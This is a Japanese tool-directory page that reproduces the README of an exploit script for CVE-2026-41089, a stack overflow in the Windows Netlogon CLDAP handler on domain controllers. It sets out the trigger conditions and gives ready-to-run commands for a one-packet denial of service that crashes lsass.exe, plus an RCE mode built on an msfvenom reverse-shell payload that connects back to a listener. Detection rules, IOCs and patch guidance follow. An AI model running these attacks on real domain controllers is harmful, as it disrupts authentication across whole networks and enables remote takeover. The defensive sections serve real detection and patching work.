Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41089 — CVE-2026-41089 は Windows Netlogon サービスにおける重要なリモートコード実行脆弱性であり、単一パケットで lsass.exe をクラッシュさせ、ドメインコントローラを約 30~60 秒で再起動させます。この間、当該 DC のすべてのドメイン認証は失敗します。 | Kitploit
ツール/GitHubGitHub/hnytgl/cve-2026-41089
脆弱性分析エクスプロイトペネトレーションテストリモートアクセスツールバイナリエクスプロイト
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 は Windows Netlogon サービスにおける重要なリモートコード実行脆弱性であり、単一パケットで lsass.exe をクラッシュさせ、ドメインコントローラを約 30~60 秒で再起動させます。この間、当該 DC のすべてのドメイン認証は失敗します。

リポジトリを見る
1412233日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41089 — Windows Netlogon CLDAP スタックバッファオーバーフロー RCE エクスプロイト

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (スタックベースのバッファオーバーフロー)
攻撃ベクトル: UDP/389 (CLDAP SearchRequest)
影響: リモートコード実行 (RCE) / サービス拒否 (DoS)
影響を受けるバージョン: Windows Server 2012 R2 ~ 2025 (ドメインコントローラー)
パッチ: 2026年5月累積更新プログラム

脆弱性の概要

netlogon.dll 内の NetpLogonPutUnicodeString 関数は、CLDAP 検索リクエストを処理する際にスタックバッファオーバーフローの脆弱性が存在します。この関数はバイト長の予算を受け取りますが、それを WCHAR カウントとして解釈するため、書き込み量が想定の 2 倍になります。

オーバーフローは NlGetLocalPingResponse 関数の 528 バイト(264 ushort) の固定スタックバッファで発生します。攻撃者が制御可能な User フィールドとサーバー自身の DNS ドメイン名がこのバッファを埋め、最終的に GS セキュリティ Cookie を上書きし、__report_gsfailure と lsass.exe のクラッシュを引き起こします。

トリガー条件

  • CLDAP SearchRequest で NtVer=0x02(古く脆弱な BuildSamLogonResponse パスを強制的に使用)
  • User フィールドの長さ ≥ 約130文字(バイナリ上限は約260バイト UTF-16)
  • サーバーの DNS ドメイン名の長さ ≥ 約80文字(ドメイン名が長いほど Cookie に到達しやすい)

注意: NtVer=0x16(多くの公開検出スクリプトが使用する値)は安全な BuildSamLogonResponseEx パスをトリガーし、脆弱性は発生しません。

機能

モード説明
--mode dos細工された CLDAP パケットを送信し、LSASS をクラッシュさせ、DC を再起動(約60秒の認証中断)
--mode rceリモートコード実行を試行(研究レベル、shellcode が必要)
--mode scan異なる NtVer 値の応答状況をスキャンし、対象 DC をフィンガープリント
--mode auto自動検出して最適な攻撃戦略を選択

DoS モード

単一パケットで lsass.exe をクラッシュさせ、ドメインコントローラーが約30〜60秒で再起動します。この間、その DC のすべてのドメイン認証が失敗します。

# 基本的な使い方 — 3つのパケットを送信
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# 単一パケットによる迅速な攻撃
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# アグレッシブモード — 5つのパケットを並行送信
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

RCE モード

⚠️ 研究レベル — 実環境では信頼性が低く不安定です。

RCE は以下の課題に直面します:

  1. オーバーフローデータはサーバー自身の DNS 名であり、攻撃者の shellcode ではない
  2. GS Cookie をバイパスする必要がある(情報漏洩プリミティブまたはブルートフォースが必要)
  3. Server 2022+ の CET/ACG/CFG により従来の ROP がより困難になる
# shellcode を生成
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# RCE チェーンを送信
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

スキャンモード

# 対象 DC をフィンガープリント
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

予想される出力例(パッチ適用済みのターゲット):

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

予想される出力例(未パッチのターゲット):

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

NtVer=0x02 がタイムアウトし、他のバージョンが正常に応答する場合、ターゲットは脆弱である可能性が高いです。

高度なパラメータ

パラメータ説明デフォルト値
-l, --user-lenユーザー名フィールドの長さ(ASCII 文字数)180
--ntverNtVer 値(16進数、例 0x02)0x02
--count送信する DoS パケット数3
--delayパケット間の遅延(秒)0.5
-t, --timeoutソケットタイムアウト(秒)5.0
--json結果を JSON 形式で出力—
--raw送信前に生のパケット16進数を表示—
--quietバナー出力を抑制—
--shellcode-fileカスタム shellcode ファイル(生の x64)—
--lhostリバースシェルのリスンアドレス—
--lportリバースシェルのリスンポート4444

テスト環境の構築

# Windows Server(未パッチ)で長いドメイン名の DC を作成:
# 1. ドメインコントローラーに昇格(DNS ドメイン名が非常に長いドメイン、例 "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. 2026年5月以前のパッチがインストールされていることを確認
# 3. 攻撃マシンから実行:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. DC のクラッシュと再起動を観察

侵害指標 (IOCs)

ネットワーク

  • UDP/389 上の User > 100 バイトかつ NtVer = 0x02 の CLDAP SearchRequest
  • 非ドメインコントローラーホストから DC への異常な CLDAP トラフィック

ホスト

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

検出ルール

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

パッチ情報

Windows Server バージョンパッチ適用済みバージョン番号備考
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

検出と修復ガイド

クイック検出(非破壊的)

# 安全な検出スクリプト — ターゲットをクラッシュさせません
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# JSON 出力(一括スキャンに適しています)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# パッチ検証手順を表示
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

検出原理:NtVer=0x02(脆弱なパスをトリガー)と NtVer=0x16(安全なパス)の短い CLDAP リクエストを送信します。0x02 がタイムアウトするが 0x16 が正常に応答する場合、ターゲットは脆弱である可能性が高いです。

修復手順

  1. 直ちにパッチをインストール:2026年5月累積更新プログラム(KB5058405 以降)

    # インストール済みの更新プログラムを確認
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # 最新の更新プログラムをインストール
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
  2. netlogon.dll のバージョンを検証:

    (Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
    # 上記のパッチバージョン番号表と照合
    
  3. 一時的な緩和策(直ちにパッチを適用できない場合):

    • ファイアウォールで UDP/389 のインバウンドを制限し、信頼できるネットワークセグメントのみ DC へのアクセスを許可
    • 異常な CLDAP リクエスト(User フィールド > 100 バイト + NtVer=0x02)を検出する IDS ルールを展開
    • Credential Guard と HVCI を有効化して RCE の影響を軽減
  4. 事後調査:

    # lsass クラッシュ記録を確認
    Get-WinEvent -FilterHashtable @{LogName='Application';Id=1000} |
      Where-Object {$_.Message -match 'lsass.exe' -and $_.Message -match '0xc0000409'} |
      Select-Object TimeCreated, Message -First 5
    

Sigma 検出ルール

title: CVE-2026-41089 Netlogon CLDAP Overflow Exploitation
id: cve-2026-41089-netlogon-crash
status: experimental
description: Detects lsass.exe crash caused by netlogon.dll stack buffer overflow
logsource:
    product: windows
    service: application
detection:
    selection:
        EventID: 1000
        Image|endswith: '\lsass.exe'
        ExceptionCode: '0xc0000409'
        FaultingModule|endswith: '\netlogon.dll'
    condition: selection
level: critical
tags:
    - attack.impact
    - attack.t1499
    - cve.2026-41089

法的声明

本ツールは 許可されたセキュリティ評価、ペネトレーションテスト、CTF コンテスト、および防御研究 のみに使用してください。明確な書面による許可なく、いかなるシステムに対して本ツールを使用することは違法です。使用者はすべての法的責任を負います。

参考リンク

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
ツールをダウンロード